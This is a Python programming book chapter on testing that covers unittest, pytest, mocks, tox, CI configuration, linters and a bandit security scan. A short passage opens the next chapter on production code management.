Before we start writing tests, let me re-iterate the basic steps we discussed in the previous section:

Figure 10.2: Structure and Flow of Tests

The simple test cases we saw checked for the equality of an integer or a string, but that will not always be the case. Remember, this is Python, and sometimes our application might warrant testing more complex objects, like a context or instances of a class. What changes in this case? We might need to create some sample test inputs, which are referred to as fixtures. They are quite commonly used and are reusable components. Also, parameterisation refers to the process of passing different input values to the same test and expecting similar results.
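As a quick sketch of both ideas in pytest, assuming the prod() function lives in the my_math_lib module used elsewhere in this chapter:

import pytest
from my_math_lib import prod

@pytest.fixture
def sample_factors():
    # A fixture: reusable sample input shared by tests that request it
    return [(12, 10, 120), (12, 12, 144)]

def test_prod_with_fixture(sample_factors):
    for x, y, expected in sample_factors:
        assert prod(x, y) == expected

# Parameterisation: the same test body is run once per input tuple
@pytest.mark.parametrize("x, y, expected", [
    (2, 3, 6),
    (-2, 3, -6),
    (0, 5, 0),
])
def test_prod_parametrized(x, y, expected):
    assert prod(x, y) == expected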

In this section, we will discuss some of the important things to keep in mind while preparing tests.

How do we handle expected failures?

Earlier in the chapter, when we were discussing what we could test for the prod() method, we came across the question – what would the function do if we entered a string as input?

In the ideal scenario, we expect the call to raise an error, and the test should pass only if that error is actually raised. This can be achieved with the help of a context manager provided by the .assertRaises() method in the unittest library, and the steps for the test can be placed within this with block. Consider the following example:

import unittest
from my_math_lib import prod

class TestProdAPI(unittest.TestCase):
    def test_integer_inputs(self):
        """ Test product of integers """
        num1, num2 = 10, 20
        output = prod(num1, num2)
        self.assertEqual(output, 200)

    def test_double_inputs(self):
        """ Test product of doubles """
        num1, num2 = 0.25, 1.25
        output = prod(num1, num2)
        self.assertEqual(output, 0.3125)

    def test_string_input(self):
        str1, num2 = "tiger", 10
        with self.assertRaises(TypeError):
            output = prod(str1, num2)

if __name__ == '__main__':
    unittest.main()

Note that in the last test case, you need to ensure that the error is raised when the wrong inputs are given. If the TypeError (or any other error you choose) is raised, the test passes.
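If you prefer pytest, the equivalent check uses the pytest.raises context manager; a minimal sketch, again assuming prod() comes from my_math_lib and raises TypeError for a string input:

import pytest
from my_math_lib import prod

def test_string_input():
    # The test passes only if the call raises TypeError
    with pytest.raises(TypeError):
        prod("tiger", 10)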

How to compartmentalize behaviors in the application?

We briefly discussed what side effects are. The possibility of side effects makes it a bit difficult to write predictable and deterministic tests, because some side effects produce a different result from the test every time it is run. Worse than that, one test could change the state of the application, which would in turn cause a different test to fail.

The sections of our test that are prone to side effects can be tested in parts using a few of the following sample techniques:

We can refactor the code into smaller modules such that they follow the Single Responsibility principle.

We can create Mocks of the functions or methods, which will do away with the side effects.

The parts of the application that are prone to side effects are more suitable for integration tests rather than unit tests.

We will be touching upon mocking functions and some of these options in detail, later in the chapter.

How do we write integration tests?

Until now, we have discussed how unit tests work – they help to ensure that your code remains stable and deterministic. However, the end user needs to operate the application as a whole, and there you need to devise ways to test the modules in an integrated manner.

Integration Tests are written to check whether the different components and modules get along well together. You have to simulate the scenario or behaviour as to how the client or the end-user might be using the application. Some steps that might be involved are as follows:

Invoking Python APIs

Calling a REST API over http or https

Executing commands on the command line

Using a web service

The structure of integration tests is similar to that of unit tests – Input, Run, and Assert – it is just the scope that is widened. The focus is on verifying multiple components at once, which makes integration tests prone to more side effects than a unit test. They also have more dependencies – they need environment setups, databases, config files, or even network sockets – which makes the case for keeping unit and integration tests separate. The fixtures for integration tests are more extensive and detailed, and the tests take longer to execute.

Unit tests should preferably be run before every commit of a branch, whereas integration tests are to be triggered before a release to production.

An ideal Python project structure that incorporates unit tests and integration tests in different modules would look like the following:

project/
│
├── my_app/
│   └── __init__.py
│
└── tests/
    ├── unit/
    │   ├── __init__.py
    │   └── test_prod.py
    │
    └── integration/
        ├── __init__.py
        └── test_application.py

Almost all the test runners support mechanisms to selectively run a single test or a group of tests. For example, in the unittest scenario, providing the start directory flag (-s) lets the runner discover tests in that path:

$ python -m unittest discover -s tests/integration

The unittest library will be executing all the tests in the directory or path you provided, and return the results.
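If you are using pytest as the runner, the same selective run can be achieved by simply pointing it at a directory, for example:

$ pytest tests/integration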

How do we test data-driven applications?

Many integration tests will require backend data, like a database, to exist with certain values. For example, you might want a test that checks that the application displays correctly with more than 100 customers in the database, or that the order page works even if the product names are displayed in Japanese.

These types of integration tests will depend on the different test fixtures to make sure they are repeatable and predictable. A good technique to use is to store the test data in a folder within your integration testing folder called fixtures to indicate that it contains the test data. Then, within your tests, you can load the data and run the test.

The following is an example of that structure if the data consisted of JSON files:

project/
│
├── my_app/
│   └── __init__.py
│
└── tests/
    ├── unit/
    │   ├── __init__.py
    │   └── test_sum.py
    │
    └── integration/
        ├── fixtures/
        │   ├── test_simple.json
        │   └── test_.json
        ├── __init__.py
        └── test_integration.py

You can set up a local dump of some of the data that you would have read from the database, let's say in the form of a JSON file. This can then be loaded in the .setUp() method of the suite, and will be available in a deterministic manner every time the tests in it are run.

import unittest

class TestSimpleApplication(unittest.TestCase):
    def setUp(self):
        # Read the data for testing
        # (App is the application under test, assumed to be importable)
        self.api = App(database='fixtures/test_simple.json')

    def test_max_passengers(self):
        self.assertEqual(len(self.api.passengers), 250)

    def test_passenger_details(self):
        passenger = self.api.find_passenger(id=245)
        self.assertEqual(passenger.name, "Albert Einstein")
        self.assertEqual(passenger.seat_number, "16A")

if __name__ == '__main__':
    unittest.main()

If there are multiple data sets that are used in different tests, loading them all in the same setUp might not be a good idea if you sometimes run single tests. Rather, create separate test classes in the script for each use case.

If your application is dependent on external or remote locations or APIs, then testing the core functionality might not be deterministic if the remote API is down or the location is unavailable. This would lead to unnecessary failures. In most cases, the solution is to store the remote fixtures in the local test suite to be used in the application.

The third-party responses package, built to work with the requests library, helps to create response fixtures to be persisted in the test folders.
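As a hedged sketch of that idea, the responses library lets a test register a canned HTTP response so that requests never leaves the process; the endpoint URL here is simply the illustrative one used later in this chapter:

import requests
import responses

@responses.activate
def test_stories_endpoint_with_local_fixture():
    # Register a canned response for the illustrative endpoint
    responses.add(
        responses.GET,
        "https://newsdb.acnmedia.com/stories",
        json=[{"id": 71, "title": "sample story"}],
        status=200,
    )
    payload = requests.get("https://newsdb.acnmedia.com/stories").json()
    assert payload[0]["id"] == 71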

Multi-environment multi-version testing

In the data science domain, the most commonly used libraries like pandas and numpy are evolving constantly. There are new features being added in most versions and also some APIs being deprecated. Till now, we have been using a single virtual environment and fixed dependencies to test our use cases. In order to test with multiple Python versions (Py2, Py3) or different versions of the same package (pandas==0.25.2 and pandas==1.0.2), we need to use third party libraries – my favorite being Tox – which helps automate the multi-environment and multi-version testing.

Tox is present in the Python Package Index and you can install it via

$ pip install tox

Let’s discuss how to configure and use it with your Python projects and environments.

Configure tox for your dependencies

The tox project is designed for running multiple checks against different versions of Python and their dependencies. A simple configuration file (tox.ini) within the project directory is needed for configuring the tool. The configuration contains the following:

The versions of Python to run the tests against.

Additional libraries that are needed before executing.

The command to execute the tests.

If you did not know anything about the configurations, Tox provides you a QuickStart application to initiate the configuration:

$ tox-quickstart

Once you have answered the questionnaire, you will have a config file which looks like the following:

[tox]
envlist = py27, py36, py37

[testenv]
deps =
    pytest
    django
commands = pytest myApplication

If your package is a distributable package, you need to ensure that you have a setup.py file available in the root directory. If your project is not meant to be distributed, then you can add the following parameter to the configuration to skip the build process:

[tox]
envlist = py27, py36, py37
skipsdist = True

In the second case, when you do not have a setup.py, any dependencies for the project need to be mentioned in the deps variable of the testenv configuration:

[testenv]
deps =
    pandas
    pytest

Having completed this stage, we can now run the tests. Tox automatically selects the version of the interpreter based on the environment to create the virtualenv. If the venv is not sane, or if dependencies are missing, it will be automatically rebuilt.

Executing tox

Tox can be run from the command line by executing the following:

$ tox

When you run this, Tox creates a virtual environment for each of the three Python versions specified, inside the .tox/ directory. Tox then executes the pytest myApplication command in each of the virtual environments.

You can also run tests against multiple versions of some of the packages. The configuration needs to be modified as follows:

[tox]
envlist = {py36,py37}-{minimum,current}

[testenv]
deps =
    minimum: pandas==0.25.2
    current: pandas==1.0.2
    pytest
commands = pytest myApplication

The preceding tox configuration will create four test scenarios – py36-minimum, py36-current, py37-minimum, and py37-current. If your application needs to ensure backward compatibility with older versions of a library, this is the best way to ensure that feature releases do not break this compatibility.

Another cool use case for tox can be to include the code formatting tests or linters in the test run step itself. Let’s take an example where we take advantage of the black library to lint and check the code formatting:

[tox]
envlist = py36, py37, py36-linter
skipsdist = True

[testenv]
deps =
    pandas
    pytest
commands = pytest myApplication

[testenv:py36-linter]
deps =
    pylint
    black
commands = black --check --diff myApplication

When you run this, Tox will run all the test scenarios. However, you can choose to run only one particular scenario by specifying it on the command line:

$ tox -e py36-linter

The initial run of Tox takes time to set up the virtualenvs, but all subsequent runs are faster.

The results from Tox are quite simple to interpret. If you want to rebuild the virtual environments, or you have changed the environments or dependencies, you need to run the following command:

$ tox -r

You can run the Tox test suite in a quiet mode using the following command:

$ tox -q

And, if you want to run the tests for debugging in a more verbose mode, use the following command:

$ tox -v

It is time to go ahead and create more automated tests for your projects and try out the robust tools and techniques discussed.

Automate your test execution

We have achieved the grouping of tests across multiple environments and multiple library versions, yet we still have to initiate the tests with a manual command. How about we automate that too?

When we make some changes and before we try to commit the source code to a version control system like git or svn, we can trigger the tests automatically and even gate the commit process on it. There are several automated testing tools available, referred to as Continuous Integration/ Continuous Deployment pipelines. These functionalities extend from testing to builds and even deployment to production.

One of my preferred tools for running automated tests and builds is Travis CI. It adapts well with Python projects for large scale automation, and can even be deployed to the cloud.

It is generally configured with the help of a simple configuration file – .travis.yml – that looks something like the following:

language: python
python:
  - "2.7"
  - "3.8"

install:
  - pip install -r requirements.txt

script:
  - pytest myApplication

When the Python application is configured with the preceding Travis CI config, it does the following:

The application is tested against multiple Python versions (Python 2.7 and Python 3.8, as listed above).

Execute the install command to set up all the libraries listed in the requirements.txt file.

Execute the command in the script section to run the tests.

Once you have integrated the repository with Travis CI, whenever you push code to your remote repository, the commands will be run automatically. Try it out on GitHub with a test repository.

Working with mock objects

Most applications that we develop are part of a larger system, and to operate, they need to connect to external services, which could be databases, REST APIs, network storage, or cloud services, among others. Given these side effects, testing just our code without thinking about them may not always be a good idea. In this section, we will discuss effective ways to handle side effects in our tests. This is where mock objects come into the picture – we use them as a defence against flaky side effects.

When your code queries a REST endpoint via HTTP, or generates an email notification, you do not want that to actually happen while running a unit test. Such calls also increase the runtime of the code under test, which should have minimal latency. So, basically, unit tests should not use such external APIs, or connect to databases or other dependencies; they should simply test the production code. Testing those interactions should be part of the integration tests, which mimic how the user will interact with the application. However, integration tests are slower to run and only feasible during the build and release processes.

So, the golden rule is that you should have extensive unit test coverage for every part of the production code that can run fast, so you can execute the tests when committing your code, or whenever you need to verify functionality. Integration tests should be fewer in number and should only be run at critical points of the CI/CD pipeline. Mock objects are useful, but it is essential to know when and where they can be used. Abusing mocks can make your code deviate from Pythonic conventions.

How do we use mock objects?

Unit testing methodologies include several types of objects which are generally termed as Test Doubles. A test double is like a stunt double for the actors while shooting a dangerous scene for a movie – it is a substitute for an actual object which replaces a production object while running as part of the test suite.

Test doubles can be classified into the following types:

Dummy objects simply fill up lists of parameters. Even though they are passed around in the code, they are never used.

Fake objects simulate the behaviour of actual production objects in a rudimentary or shortcut way. For example, a TestDatabase class can be used to locally simulate how the DB connection object works, without an actual database being used.

Stubs are a way to simulate API calls, returning a predefined or computed value when called. However, they are coupled to and called only from the test, and do not work outside the test scope.

Spies are built on stubs, but differ in that they can maintain state, depending upon how they are called. Consider a simulated notification service that needs to keep track of how many alerts were generated.

Mocks are objects that are very versatile and flexible, and can be configured in whatever way is deemed most appropriate according to the expectations of the application. They can also differentiate between which kinds of calls to expect and when to raise an exception.

Figure 10.3: Test Doubles

The unittest library in Python comes bundled with its own set of Mock utilities and objects for this purpose, and it is widely adopted in most production test suites. It can be accessed as follows:

unittest.mock.Mock

The Mock can be configured to resemble an object of the class you are using in production, and can emulate similar behaviour and responses. The Mock object also records how it was invoked and used, and stores any intermediate information needed, so that assertions can be written later for verification. The Mock object of the Python standard library provides adequate support in the API for assertions on the behaviour of the object during a test.

Types of mock objects in Python

The unittest.mock module that we mentioned earlier comes bundled with two different types of objects – Mock and MagicMock. The difference is simple – Mock is a test double which you can configure to return any type of value and which tracks the calls that were made to it, while MagicMock does the same thing but also supports the magic methods that make your code Pythonic.

If your code is Pythonic and makes use of magic methods or dunders, the MagicMock is the API that you should choose for reliably testing your code.

If we try enforcing the Mock class when the code is making use of magic methods, it will raise an exception as illustrated in the following code:

from typing import Dict, List

class RepositoryActions:
    def __init__(self, commit_objs: List[Dict]):
        self._commIds = {commit["id"]: commit
                         for commit in commit_objs}

    def __getitem__(self, id_of_commit):
        return self._commIds[id_of_commit]

    def __len__(self):
        return len(self._commIds)

def get_user_from_id(id_of_commit, branch_obj):
    return branch_obj[id_of_commit]["author"]

Say we want to test the functionality where the get_user_from_id method needs to be called. Since the whole object is not being tested, you can pass any value for the arguments and any value can be returned:

# Creating a branch object and using it
def test_func_with_obj():
    repo_branch = RepositoryActions([{
        "id": "1afe34546c",
        "author": "churchill"
    }])
    assert get_user_from_id("1afe34546c", repo_branch) == "churchill"

# Using Mock for mocking the branch.
def test_func_with_mock():
    repo_author = get_user_from_id("1afe34546c", Mock()) is not None
    …

If you run the preceding code, you will note that this raises an exception like the following:

    def get_user_from_id(id_of_commit, branch_obj):
>       return branch_obj[id_of_commit]["author"]
E       TypeError: 'Mock' object is not subscriptable

However, if you use MagicMock instead, you will have access to the magic methods, and thereby you will be able to control the object and its execution in the test:

def test_func_with_magicmock():
    branch_obj = MagicMock()
    branch_obj.__getitem__.return_value = {"author": "churchill"}
    assert get_user_from_id("1afe34546c", branch_obj) == "churchill"

Advanced use of the Mock API

Let us define a NewsPortal class with a get_stories method. Calling get_stories on a NewsPortal object will in turn invoke an API call to a remote REST endpoint, from where a JSON object is returned as a response. We will need the requests library for this, so make sure to install it before trying out the following code:

import requests

class NewsPortal:
    def __init__(self, org_name):
        ''' Set name of the media site '''
        self.org_name = org_name

    def get_stories(self):
        response = requests.get("https://newsdb.acnmedia.com/stories")
        return response.json()

    def __repr__(self):
        # The exact repr string was lost in the original; this is an assumed form
        return '<NewsPortal: {}>'.format(self.org_name)

Now, we want to test the functionality of this class without triggering the API call to the production data source or endpoint. The API call will not give the same return value every time, so relying on such an unpredictable construct would be useless in a unit test. This is where the @patch decorator will be used to patch the NewsPortal object's get_stories method:

from unittest import TestCase
from unittest.mock import patch, Mock

class TestNewsPortal(TestCase):
    @patch('main.NewsPortal')
    def test_get_stories(self, MockNewsPortal):
        news = MockNewsPortal()
        news.stories.return_value = [
            {
                'userId': 21,
                'id': 71,
                'title': 'Russia announces human trials of vaccine',
                'body': 'The first human trials of the COVID vaccine is ready for mass production.'
            }
        ]
        response = news.stories()

        # Check if response is valid
        self.assertIsNotNone(response)

        # Check if the return type is a dictionary
        self.assertIsInstance(response[0], dict)

See how the MockNewsPortal object is being passed as an argument to the test function? Where did that come from? What happens here is that when the test method is decorated with the @patch decorator, a Mock of the object passed to patch is created and handed to the decorated method as a parameter. So here, a mock of the main.NewsPortal class is created and passed to the test function as MockNewsPortal. Do note that the object reference passed as an argument to patch should be importable in the namespace. If we invoke news.stories() on the mock, the news portal object will return the dummy JSON data that we configured. Hence, we will have successful tests.
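The same patching can also be expressed as a context manager instead of a decorator, which keeps the replacement scoped to the with block; a minimal sketch based on the example above:

from unittest import TestCase
from unittest.mock import patch

class TestNewsPortalWithContextManager(TestCase):
    def test_get_stories(self):
        # main.NewsPortal is replaced only inside the with block
        with patch('main.NewsPortal') as MockNewsPortal:
            news = MockNewsPortal()
            news.stories.return_value = [{'id': 71, 'title': 'sample'}]
            self.assertEqual(news.stories()[0]['id'], 71)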

Assertions on Mock objects

Let us use the NewsPortal example that we discussed in the previous section to illustrate some more assertions that can be used with the Mock objects.

import main

from unittest import TestCase
from unittest.mock import patch

class TestNewsPortal(TestCase):
    @patch('main.NewsPortal')
    def test_get_stories(self, MockNewsPortal):
        news = MockNewsPortal()
        news.stories.return_value = [
            {
                'userId': 21,
                'id': 71,
                'title': 'Russia announces human trials of vaccine',
                'body': 'The first human trials of the COVID vaccine is ready for mass production.'
            }
        ]

        response = news.stories()

        # Check if response is valid
        self.assertIsNotNone(response)

        # Check if the return type is a dictionary
        self.assertIsInstance(response[0], dict)

        # Verify Mock is created for the correct object
        assert MockNewsPortal is main.NewsPortal

        # Was the Mock object invoked?
        assert MockNewsPortal.called

        # Called with no parameters
        news.stories.assert_called_with()

        # We invoked the stories method exactly once, without arguments
        news.stories.assert_called_once_with()

        # Check if the method was called with some parameters
        # (this particular assertion would fail here, since stories()
        # was called without arguments)
        news.stories.assert_called_with("hello", "world")

        # Reset Mock
        news.reset_mock()

        # Verify that after the Mock is reset,
        # the method registers as not called.
        news.stories.assert_not_called()

The preceding assertions give an edge to the mock testing where the state of the Mock object can provide metadata about the usage which can be used with tests.

Using Mocks also helps assess additional information like how many invocations were made to the API, what parameters were passed to it, or if the API was even invoked at all. You might not be able to do that inherently in production.

You can also reset a Mock object to its initial state during the execution of the test. This is a very useful feature when we want to test the object against multiple sets of inputs: you can reset and reuse the same object multiple times, without explicitly creating a new object for every input set.

Cautions about usage of mocks and patching

Unit tests help achieve better code quality, since we start focussing on how to write testable code in the implementation phase itself. This makes your code modular, cohesive, and granular.

We saw that unittest.mock.patch is used for patching objects – meaning we replace the original object with something else that transforms it into a mock object. Because this replacement happens at runtime, we lose contact with the original code, making the test a bit shallower. Modifying objects at runtime also comes with its set of performance snags, due to the overhead of the modification itself.

Using mocks, also referred to as monkey patching, is quite useful in moderation. But abusing or overusing mocks can indicate that the code is suboptimal and needs to be improved.

Let’s take up the example of the prod() method that we defined in the beginning. While testing this, what if, instead of returning a pre-defined value, we use a custom product method to simulate the results? The substitute method can simply trim out the unnecessary parts of the code, including the print statements, loggers, sleeps, and so on, and only perform the core computation for faster tests. For this, a side effect can be defined like the following:

from unittest import TestCase
from unittest.mock import patch

def mock_prod(x, y):
    # trimmed down version of the function
    return x * y

class TestMultiplier(TestCase):
    @patch('main.Multiplier.prod', side_effect=mock_prod)
    def test_prod(self, prod):
        self.assertEqual(prod(12, 10), 120)
        self.assertEqual(prod(3, 7), 21)

The tests should successfully pass when run:

.
_____________________________________________________
Ran 1 test in 0.001s

OK

Miscellaneous testing trivia

flake8 based passive linting

Linting checks your code for syntactical and conventional flaws, even before you proceed to run the unit tests. Linters usually follow the PEP8 specifications. One widely used linter is flake8, which you can install from pip as follows:

$ pip install flake8

The flake8 command can then be run from the terminal for a Python script, a module, a folder, or even a regex pattern.

$ flake8 myScript.py
myScript.py:2:1: E305 expected 2 blank lines after class or function definition, found 1
myScript.py:22:1: E302 expected 2 blank lines, found 1
myScript.py:24:20: W292 no newline at end of file

A list of errors and warnings will be printed on the console indicating which section of the code has the error, the error type, and description.

You can configure flake8 on a project level as well as run it independently on the command line. If certain errors or warnings are expected in your project, you can specify them for exclusion as rules in a configuration file. You can put the settings in a .flake8 file in your project directory or in the setup.cfg file. If you have configured the project to use Tox, you can also place the flake8 configuration in your tox.ini file.

Consider the following example, where we skip the __pycache__ and .git directories from checks. We also add a rule to ignore the E305 errors and raise the max-line-length limit to 90.

[flake8]
ignore = E305
exclude = __pycache__,.git
max-line-length = 90

Alternatively, you can provide the following options on the command line:

$ flake8 --ignore E305 --exclude __pycache__,.git --max-line-length=90

The help option or the official documentation of flake8 can be referred to for the other important parameters. Flake8 can be added to the Travis CI configuration directly with something like the following:

matrix:
  include:
    - python: "3.7"
      script: "flake8"

When this is set up, Travis CI will pick up the rules you have defined in the .flake8 config in the project folder, and if any flake8 failures are encountered while linting, the build process will fail. Ensure that flake8 is added as a dependency for your project in the requirements.txt file.

Regular Linting also helps to indicate long term technical debt in your code. Sometimes while writing tests, we might copy paste a lot of code, which accumulates into an unmanageable codebase. In the future, when the code changes drastically, changing the tests might be quite an endeavor. Always remember the D.R.Y (Don’t Repeat Yourself) principle even while creating test suites.

More aggressive linting with code formatters

Passive linters are like colleagues who will review your code and find all the mistakes for you to fix. Code formatters, on the other hand, are like that rare friend who will sit and fix the issues in your code. Flake8 is a passive linter. Code formatters like Black will identify the deviations in your code by linting, and then fix them for you so that the code meets the standards and conventions that are widely accepted. Black is available for Python 3.6 and beyond, and it is a strict code formatter, that is, you do not get any configuration options. However, the style and conventions that Black follows are quite specific and produce beautifully formatted Pythonic code. You can simply add it to your test pipeline and let it work its magic on your scattered code every time before the code is tested.

Black is my personal preference as it quietly does its job without you even telling it how to. It is available to be installed from pip:

$ pip install black

In order to run the formatter, simply call Black on the specific file or directory of files that need to be formatted.

$ black test.py

The code will be formatted in place and saved to the same files and directories.

Benchmark and performance testing the code

Python code can be benchmarked in several ways. A very common and useful way, part of the Python standard library, is the timeit module. Fundamentally, this module invokes your functions or methods a fixed number of times and generates statistics on the execution time. Consider the following example, where a test method is defined and the timeit module is used to assess its performance:

from timeit import timeit

def test_something():
    # … your code to invoke the API
    # … assert something
    # … assert something else
    pass

if __name__ == '__main__':
    time = timeit(
        "test_something()",
        setup="from __main__ import test_something",
        number=100
    )
    print(time)

This will run the statement passed in the first argument 100 times, as specified by the number parameter (the setup statement is executed once to import the function), and print the total time taken for those runs.

The other, more advanced, option, if you are using pytest as your test runner, is the pytest-benchmark plugin. Here, the benchmark is implemented in the form of a test fixture. When you pass any callable to the benchmark fixture, the time taken to execute the callable will be logged with the results once it is run by pytest. For benchmarking the performance, you can create a separate test and pass the test function or callable to it.

def test_performance(benchmark):
    result = benchmark(test_function)

When you run pytest, the results of the benchmark will also be included in the console output:

Figure 10.4: Result of pytest for illustration

Assessing security flaws in your application

Apart from syntax and functionality tests, sometimes it is important to also check for security issues and vulnerabilities in your application. For this purpose, we suggest using the bandit module. It is a static analysis tool that can find common security issues in Python code. It is available in the Python Package Index and can be installed as follows:

$ pip install bandit

It takes a Python script as an argument on the command line (use the -r flag to run it recursively on your project folder), and it will scan the code and generate a report covering various security-related factors. Consider the following example, where we run bandit on a script that tries to run a bash command to compress some files:

$ bandit -r my_sum
[main]  INFO    profile include tests: None
[main]  INFO    profile exclude tests: None
[main]  INFO    cli include tests: None
[main]  INFO    cli exclude tests: None
[main]  INFO    running on Python 3.7.4
[node_visitor]  INFO    Unable to find qualified name for module: testArchive.py
Run started:2020-09-06 22:36:01.861150

Test results:
>> Issue: [B605:start_process_with_a_shell] Starting a process with a shell, possible injection detected, security issue.
   Severity: High   Confidence: High
   Location: archiveAndCleanup.py:56
   More Info: https://bandit.readthedocs.io/en/latest/plugins/b605_start_process_with_a_shell.html
55     if os.path.isdir(folder_to_compress):
56         os.system(
57             "tar cf - {}".format(folder))
58     else:

--------------------------------------------------
Code scanned:
  Total lines of code: 254
  Total lines skipped (#nosec): 0

Run metrics:
  Total issues (by severity):
    Undefined: 0.0
    Low: 0.0
    Medium: 0.0
    High: 1.0
  Total issues (by confidence):
    Undefined: 0.0
    Low: 0.0
    Medium: 0.0
    High: 1.0
Files skipped (0):

Similar to how we configured flake8, we can also add a section to the setup.cfg file to include any such errors or warnings that you want to ignore. It should look something like the following:

[bandit]
exclude: /test
tests: B102,B302,B101

Best practices and guidelines for writing effective tests

Prefer using automated testing tools

Humans are inherently lazy. If the developers do not care about the code, it is easy to skip adding test cases, or to skip executing test runs after every change committed. Test automation is becoming increasingly important, and several suites have come up with support for automation. It is essential to choose one that suits your needs and learn how to use it properly.

The built-in unittest library is powerful and sufficient for most basic projects and repositories. It is quite a feature-rich and user-friendly framework for writing tests which, in fact, was modeled after the popular JUnit library for Java. Python's standard library code makes heavy use of unittest, and it is useful for reasonably complex projects as well. unittest also supports the following:

Automatically discovering tests.

OOP based APIs for writing test suites and cases.

Simple CLI for execution and analysis.

Ability to choose or disable certain tests from the suite.

Most production code bases are built around version-control-based repositories. Almost all of these systems support pre-procedures and post-procedures to be run before and after commits. In git, these are referred to as hooks. It is a good idea to configure a git hook to run the tests before the code is committed or pushed to a shared repository.

Using doctest for single line tests

Python also comes with a doctest module where you can write small pieces of code within your source code and execute them later. It is a form of in-situ testing that can be localized to the unit that needs to be tested. The syntax of such tests looks like lines in an interactive Python shell, and they are written in the docstrings of the functions, methods, or classes.

Doctests are not exactly unit tests – they have a different purpose. They are minimal, less detailed, and do not handle external dependencies or regression bugs. They primarily serve as documentation for the different use cases of the module and sub-components that they relate to.

A function with doctest looks like the following:

def product(x, y):
    """Return the product of x & y.

    >>> product(2, 4)
    8
    >>> product(-2, 2)
    -4
    """
    return x * y

if __name__ == '__main__':
    import doctest
    doctest.testmod()

Doctests should be run automatically every time your complete test suite is run. When you execute the preceding module from the command line, if any of the calls in the docstrings behave differently from what is recorded, the doctest module will complain.
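The doctest module can also be invoked directly from the command line, which makes it easy to wire doctests into the same pipeline as the rest of the suite; assuming the function above is saved in a file named product.py (a hypothetical name), a verbose run looks like this, and pytest can collect doctests as well via its --doctest-modules flag:

$ python -m doctest product.py -v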

Test-Driven Development (TDD) is a concept that is becoming increasingly important, given its effectiveness. Doctests are a recommended way to implement TDD in Python code: when you start writing a method, define the expected use cases as doctests with different inputs.

Segregate your test code from your application code

The worst idea you can have is to import your test code or test script in your application code. I know developers who write code in this manner and rely on test discovery tools to pick up the test while running. Although this might work, it leads to growing confusion as the code scales up. Another less common malpractice is to place the test invocation in the if __name__ == '__main__' section to invoke the tests when the module is called directly.

Writing libraries and their test classes in the same script or module may sound like you are writing modular code but it does not make for a scalable architecture.

Nothing justifies putting the application and test code in the same place. The ideal way is to follow the segregation in terms of modules as mentioned in the original directory structure for applications. The unittest module documentation outlines several reasons for isolating the tests from the code, which are as follows:

Tested code can be refactored more easily.

The test module can be run standalone from the command line.

The test code should be modified much less frequently than the code it tests.

The test code can more easily be separated from the shipped code.

Tests for modules written in C must be in separate modules anyway, so why not be consistent?

There is less temptation to change the test code to fit the code it tests without a good reason.

If the testing strategy changes, there is no need to change the source code.

Python was created meticulously with much time, energy, and love. As a rule of thumb, following the conventions outlined in the documentation is a definite way of making your code Pythonic.

Choose the right asserts in your tests

The Python unittest library has the unittest.TestCase class, which predefines several useful assert methods. Some novice developers use assertTrue in almost all their tests, which is not a Pythonic practice and is considered an antipattern. Using the right type of assertion not only makes the code clearer for readers, but also ensures that unintended edge cases are handled. The regular way:

class Test(unittest.TestCase):
    def setUp(self):
        self.THLD = 10

    def test_product(self):
        self.assertTrue(product(12, 3) == 36)

    def test_has_breached_threshold(self):
        self.assertTrue(has_breached_threshold(12) > self.THLD)

    def test_prime_factors(self):
        self.assertTrue(prime_factors(7) is None)

The Pythonic way:

class Test(unittest.TestCase):
    def setUp(self):
        self.THLD = 10

    def test_product(self):
        self.assertEqual(product(12, 3), 36)

    def test_has_breached_threshold(self):
        self.assertGreater(
            has_breached_threshold(12), self.THLD
        )

    def test_prime_factors(self):
        self.assertIsNone(prime_factors(7))

Conclusion

Unlike earlier languages, where testing was a ton of effort, Python has made things quite simple. There are libraries and command-line utilities that you can use to ensure that your code behaves as it was designed to. It is not a complicated process, and there are well defined conventions and best practices that ensure you have a robust codebase. unittest and pytest come bundled with several useful features, tools, and APIs that can help you write maintainable, error-free, and validated production code. This is what we have tried to highlight in this chapter. I hope you have a bug-free future with Python.

We are almost at the end of the Pythonic journey. In the final chapter, we will be taking a look at the different ways that the Python software is packaged and shipped, and how you can create and maintain a robust and secure Python environment in production.

Key takeaways

Tests need to be deterministic in nature, that is, they should return the same results regardless of how many times they are run.

Test cases should be modular, which means that the assertions in a test case should only be relevant to that test case.

The unittest framework in Python comes bundled with the setUp() and tearDown() methods which are automatically called before and after the tests respectively.

If the test has more side effects, it could be violating the Single Responsibility Principle, which says that your unit should implement a single functionality.

Sample test inputs are referred to as fixtures.

The parts of the application that are prone to side effects are more suitable for integration tests rather than unit tests.

Unit tests should preferably be run before every commit of a branch, whereas integration tests are to be triggered before a release to production.

The third-party responses package, built to work with the requests library, helps to create response fixtures to be persisted in the test folders.

Use tox for testing against multiple Python versions or multiple versions of a package.

If your code is Pythonic and makes use of magic methods or dunders, the MagicMock is the API you should choose for reliably testing your code.

Using Mocks also helps assess additional information like how many invocations were made to the API, what parameters were passed to it, or if the API was even invoked at all.

Regular linting also helps to indicate long term technical debt in your code.

It is a good idea to configure a git hook to run tests before code is committed or pushed to a shared repository.

Doctests are a recommended way to implement Test-Driven Development in Python code.

Writing libraries and their test classes in the same script or module may sound like you are writing modular code, but it does not make for a scalable architecture.

Further reading

Harry J.W. Percival, Test-Driven Development with Python

Moshe Zadka, An Introduction to Mutation Testing in Python

CHAPTER 11 Production Code Management

“If you don’t innovate fast, disrupt your industry, disrupt yourself, you’ll be left behind.”

— John Chambers

Release management and process requirements follow a sort of similar pattern for every software development organization. However, the data scientist community takes a backseat when it comes to writing production quality code.

There is not a very clear demarcation between what is construed as production code and what isn't. However, there are widely expected and followed conventions and best practices which help to make your code reliable and aesthetically manageable. One major difference to consider is that production code is read and written by far more people over time than just the author. It is therefore very important that our production code has the following features:

Deterministic and reproducible, so that it can be consistently executed by multiple people.

Modular and has good documentation, so that it can be clearly read by multiple people.

You might have already encountered these challenges in modern software engineering. You can implement the same to tackle the challenges in Python and Data Science.

Figure 11.1: Features of Production Quality Code

Writing effective production code is not rocket science. Do not underestimate your engineers or data scientists – they have seen it all. If someone possesses the ability to understand neural networks or implement a support vector machine, they can certainly adhere to good coding practices.

Structure

The chapter will focus mainly upon the following areas:

Packaging Python code

Distributable code best practices

Using virtual environments in production

Garbage collection

Application security and cryptography

Python code profiling

Understanding GIL and multiprocessing

Objectives

The tools, techniques, and concepts that we will be discussing will help you improve the quality of your work in Python, and also help you ship more robust code for a production environment. At the end of this chapter, you will be able to do the following:

Create a distributable Python application.

Understand how memory is managed in Python applications.

Learn how to secure your application code.

